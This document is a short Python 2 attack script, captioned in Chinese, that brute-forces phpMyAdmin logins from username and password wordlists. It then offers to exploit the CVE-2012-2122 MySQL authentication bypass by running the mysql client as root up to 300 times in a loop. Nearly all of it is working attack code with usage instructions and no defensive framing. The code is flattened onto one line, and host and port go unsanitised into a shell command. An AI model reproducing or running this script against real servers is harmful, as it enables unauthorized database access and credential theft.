PHPMyAdmin暴力破解,加上CVE-2012-2122 MySQL Authentication Bypass Vulnerability漏洞利用。
#!/usr/bin/env python import urllib import urllib2 import cookielib import sys import subprocess def Crack(url,username,password): opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.LWPCookieJar())) headers = {\'User-Agent\' : \'Mozilla/5.0 (Windows NT 6.1; WOW64)\'} params = urllib.urlencode({\'pma_username\': username, \'pma_password\': password}) request = urllib2.Request(url+\"/index.php\", params,headers) response = opener.open(request) a=response.read() if a.find(\'Database server\')!=-1 and a.find(\'name=\"login_form\"\')==-1: return username,password return 0 def MySQLAuthenticationBypassCheck(host,port): i=0 while i<300: i=i+1 subprocess.Popen(\"mysql --host=%s -P %s -uroot -piswin\" % (host,port),shell=True).wait() if __name__ == \'__main__\': if len(sys.argv)<4: print \"#author:iswin\\n#useage python pma.py http://www.jb51.net/phpmyadmin/ username.txt password.txt\" sys.exit() print \"Bruting,Pleas wait...\" for name in open(sys.argv[2],\"r\"): for passw in open(sys.argv[3],\"r\"): state=Crack(sys.argv[1],name,passw) if state!=0: print \"\\nBrute successful\" print \"UserName: \"+state[0]+\"PassWord: \"+state[1] sys.exit() print \"Sorry,Brute failed...,try to use MySQLAuthenticationBypassCheck\" choice=raw_input(\'Warning:This function needs mysql environment.\\nY:Try to MySQLAuthenticationBypassCheck\\nOthers:Exit\\n\') if choice==\'Y\' or choice==\'y\': host=raw_input(\'Host:\') port=raw_input(\'Port:\') MySQLAuthenticationBypassCheck(host,port)